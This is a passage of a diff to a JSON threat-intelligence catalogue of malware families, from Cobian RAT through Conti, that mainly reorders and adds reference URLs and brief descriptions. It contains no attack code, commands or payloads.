"https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e", + "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html", + "https://blog.exatrack.com/melofee/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.istrosec.com/blog/apt-sk-cobalt/", + "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", + "https://www.youtube.com/watch?v=XfUTpwZKCDU", + "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf", + "https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811", + "https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/", + "https://www.arashparsa.com/hook-heaps-and-live-free/", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://redcanary.com/blog/grief-ransomware/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html", + "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", + "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/", + "https://www.malware-traffic-analysis.net/2021/09/29/index.html", + "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf", + "https://blog.nviso.eu/2022/03/22/cobalt-strike-overview-part-7/", + "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", + "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/", + "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", + "https://twitter.com/redcanary/status/1334224861628039169", + "https://redcanary.com/blog/getsystem-offsec/", + "https://www.accenture.com/us-en/blogs/security/ransomware-hades", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://blog.nviso.eu/2021/10/27/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-2/", + "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack" ], "synonyms": [ "Agentemis", @@ -18769,10 +19669,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", - "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/", "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat", - "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", - "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html" + "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html", + "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/", + "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html" ], "synonyms": [], "type": [] @@ -18785,15 +19685,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", + "https://www.group-ib.com/blog/renaissance", + "https://www.netscout.com/blog/asert/double-infection-double-fun", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/", - "https://www.netscout.com/blog/asert/double-infection-double-fun", - "https://www.group-ib.com/blog/renaissance", - "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", - "https://www.secureworks.com/research/threat-profiles/gold-kingswood", - "http://www.secureworks.com/research/threat-profiles/gold-kingswood" + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood" ], "synonyms": [ "COOLPANTS" @@ -18808,22 +19708,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", - "https://github.com/hfiref0x/TDL", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", + "https://docs.broadcom.com/doc/waterbug-attack-group", + "https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf", + "https://www.circl.lu/pub/tr-25/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a", + "https://github.com/hfiref0x/TDL", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", "https://www.secureworks.com/research/threat-profiles/iron-hunter", - "https://www.circl.lu/pub/tr-25/", - "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", - "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", - "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon", - "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", - "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a", - "https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf", - "https://docs.broadcom.com/doc/waterbug-attack-group", "https://www.youtube.com/watch?v=FttiysUZmDw", - "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/" + "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon" ], "synonyms": [ "Carbon" @@ -18890,12 +19790,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", - "https://secrary.com/ReversingMalware/CoinMiner/", "https://www.triskelelabs.com/investigating-monero-coin-miner", - "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/", - "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/", "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/", + "https://secrary.com/ReversingMalware/CoinMiner/", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/", + "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/" ], "synonyms": [], @@ -18922,8 +19822,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldlock", - "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html", - "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5" + "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5", + "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html" ], "synonyms": [], "type": [] @@ -18936,11 +19836,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldseal", - "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/", - "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/", + "https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html", "https://www.youtube.com/watch?v=242Tn0IL2jE", "https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html", - "https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html" + "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/", + "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/" ], "synonyms": [ "ColdSeal" @@ -18955,9 +19855,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldstealer", + "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", "https://asec.ahnlab.com/ko/31703/", - "https://asec.ahnlab.com/en/32090/", - "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/" + "https://asec.ahnlab.com/en/32090/" ], "synonyms": [], "type": [] @@ -18966,16 +19866,16 @@ "value": "ColdStealer" }, { - "description": "", + "description": "According to cloudsek, Colibri Loader is a form of malware designed to facilitate the installation of additional malware types on an already compromised system. This loader employs various techniques to evade detection, such as excluding the Import Address Table (IAT) and utilizing encrypted strings to complicate analysis. Similar to other loader malware, Colibri can be utilized to deploy information-stealing malware, potentially leading to significant loss of sensitive data. As a result, users should exercise caution when encountering unfamiliar files on their systems.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri", "https://github.com/Casperinous/colibri_loader", - "https://cloudsek.com/in-depth-technical-analysis-of-colibri-loader-malware/", "https://fr3d.hk/blog/colibri-loader-back-to-basics", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf", + "https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign", "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", - "https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign" + "https://cloudsek.com/in-depth-technical-analysis-of-colibri-loader-malware/", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf" ], "synonyms": [], "type": [] @@ -18983,13 +19883,26 @@ "uuid": "09926538-a7a0-413b-bc7d-4b20a8f4b515", "value": "Colibri Loader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.collection_rat", + "https://blog.talosintelligence.com/lazarus-collectionrat/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6c6570f3-b407-458f-bb83-647c0b1f5dd9", + "value": "Collection RAT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba", - "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html", - "https://www.vmray.com/cyber-security-blog/cutting-off-command-and-control-infrastructure-collectorgoomba-threat-bulletin/" + "https://www.vmray.com/cyber-security-blog/cutting-off-command-and-control-infrastructure-collectorgoomba-threat-bulletin/", + "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html" ], "synonyms": [ "Collector Stealer" @@ -19005,8 +19918,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony", "https://twitter.com/anyrun_app/status/976385355384590337", - "https://pastebin.com/GtjBXDmz", - "https://secrary.com/ReversingMalware/Colony_Bandios/" + "https://secrary.com/ReversingMalware/Colony_Bandios/", + "https://pastebin.com/GtjBXDmz" ], "synonyms": [ "Bandios", @@ -19048,11 +19961,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker", - "https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/", - "https://www.anquanke.com/post/id/230161", "https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/", + "http://blog.nsfocus.net/stumbzarus-apt-lazarus/", "https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/", - "https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/" + "https://www.anquanke.com/post/id/230161", + "https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/", + "https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/", + "https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/", + "https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf" ], "synonyms": [], "type": [] @@ -19074,12 +19990,12 @@ "value": "Comfoo" }, { - "description": "", + "description": "ComLook is a malicious plugin for the mail client \"The Bat!\", written in C++ and compiled with MSVC 10.0. It implements malicious commands like PutFile, GetFile, SetConfig, GetConfig, and Command. It contains hard-coded email addresses and other information, indicating a target in Azerbaijan. It was first uploaded to VirusTotal on January 12, 2022, and is associated with the APT group Turla. It appears to be a targeted deployment.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comlook", - "https://www.msreverseengineering.com/blog/2022/1/25/an-exhaustively-analyzed-idb-for-comlook", - "https://twitter.com/ClearskySec/status/1484211242474561540" + "https://twitter.com/ClearskySec/status/1484211242474561540", + "https://www.msreverseengineering.com/blog/2022/1/25/an-exhaustively-analyzed-idb-for-comlook" ], "synonyms": [], "type": [] @@ -19092,6 +20008,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.common_magic", + "https://securelist.com/cloudwizard-apt/109722/", "https://securelist.com/bad-magic-apt/109087/?s=31" ], "synonyms": [], @@ -19119,11 +20036,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun", + "https://securelist.com/compfun-successor-reductor/93633/", "https://securelist.com/it-threat-evolution-q2-2020/98230", "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://securelist.com/compfun-http-status-based-trojan/96874/", - "https://securelist.com/compfun-successor-reductor/93633/" + "https://securelist.com/compfun-http-status-based-trojan/96874/" ], "synonyms": [ "Reductor RAT" @@ -19138,8 +20055,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", - "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/", "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", + "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/", "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", "https://www.secureworks.com/research/threat-profiles/iron-twilight" ], @@ -19169,8 +20086,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy", - "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", - "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html", + "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf" ], "synonyms": [], "type": [] @@ -19183,15 +20100,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", - "https://github.com/tillmannw/cnfckr", - "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Conficker/Conficker.md", - "https://www.minitool.com/backup-tips/conficker-worm.html", - "http://contagiodump.blogspot.com/2009/05/win32conficker.html", - "https://redcanary.com/blog/intelligence-insights-january-2022/", - "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html", - "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf", "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker", - "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf" + "https://redcanary.com/blog/intelligence-insights-january-2022/", + "https://www.minitool.com/backup-tips/conficker-worm.html", + "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Conficker/Conficker.md", + "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", + "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf", + "https://github.com/tillmannw/cnfckr", + "http://contagiodump.blogspot.com/2009/05/win32conficker.html" ], "synonyms": [ "Kido", @@ -19209,9 +20126,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/", - "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/", - "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html" + "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html", + "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat" ], "synonyms": [], "type": [] @@ -19224,197 +20141,203 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti", - "https://securelist.com/luna-black-basta-ransomware/106950", - "https://marcoramilli.com/2021/11/07/conti-ransomware-cheat-sheet/", - "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2", - "https://medium.com/@arnozobec/analyzing-conti-leaks-without-speaking-russian-only-methodology-f5aecc594d1b", - "https://us-cert.cisa.gov/ncas/alerts/aa21-265a", - "https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru", - "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir", - "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", - "https://krebsonsecurity.com/2021/10/conti-ransom-gang-starts-selling-access-to-victims/", - "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/", - "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti", - "https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware", - "https://cocomelonc.github.io/investigation/2022/04/11/malw-inv-conti-2.html", - "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider", - "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems", - "https://www.cyberscoop.com/ransomware-gang-conti-bounced-back/", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf", - "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/", - "https://lifars.com/wp-content/uploads/2021/10/ContiRansomware_Whitepaper.pdf", - "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf", - "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65", - "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", - "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html", - "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", - "https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement", - "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", - "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships", - "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://cocomelonc.github.io/investigation/2022/03/27/malw-inv-conti-1.html", - "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", - "https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html", - "https://www.ironnet.com/blog/ransomware-graphic-blog", - "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/", - "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", - "https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html", - "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", - "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider", - "https://github.com/whichbuffer/Conti-Ransomware-IOC", - "https://arcticwolf.com/resources/blog/karakurt-web", - "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://nakedsecurity.sophos.com/2021/08/06/conti-ransomware-affiliate-goes-rogue-leaks-company-data/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html", - "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf", - "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/", - "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf", - "https://www.connectwise.com/resources/conti-profile", - "https://unit42.paloaltonetworks.com/conti-ransomware-gang/", - "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/", - "http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/", - "https://therecord.media/conti-leaks-the-panama-papers-of-ransomware/", - "https://intel471.com/blog/conti-leaks-cybercrime-fire-team", - "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware", - "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/", - "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1", - "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", - "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/", - "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", - "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx", - "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", - "https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/", - "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html", - "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my", - "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://securelist.com/modern-ransomware-groups-ttps/106824/", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", - "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573", - "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware", - "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", - "https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures", - "https://www.ic3.gov/Media/News/2021/210521.pdf", - "https://damonmccoy.com/papers/Ransomware_eCrime22.pdf", - "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/", - "https://arcticwolf.com/resources/blog/conti-ransomware-leak-analyzed", - "https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8", - "https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/", - "https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html", - "https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728", - "https://www.darktrace.com/en/blog/the-double-extortion-business-conti-ransomware-gang-finds-new-avenues-of-negotiation/", - "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/", - "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/", - "https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/", - "https://www.bleepingcomputer.com/news/security/conti-ransomwares-internal-chats-leaked-after-siding-with-russia/", - "https://www.youtube.com/watch?v=cYx7sQRbjGA", - "https://thedfirreport.com/2021/05/12/conti-ransomware/", - "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/", - "https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf", - 